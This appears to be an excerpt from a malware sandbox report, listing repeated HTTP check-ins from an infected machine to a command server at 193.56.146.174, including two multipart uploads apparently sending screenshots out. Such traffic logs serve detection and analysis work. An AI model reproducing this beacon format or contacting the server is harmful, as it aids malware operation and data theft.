                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODMyNTM=Host: 193.56.146.174Content-Length: 83405Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODMyNTM=Host: 193.56.146.174Content-Length: 83405Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
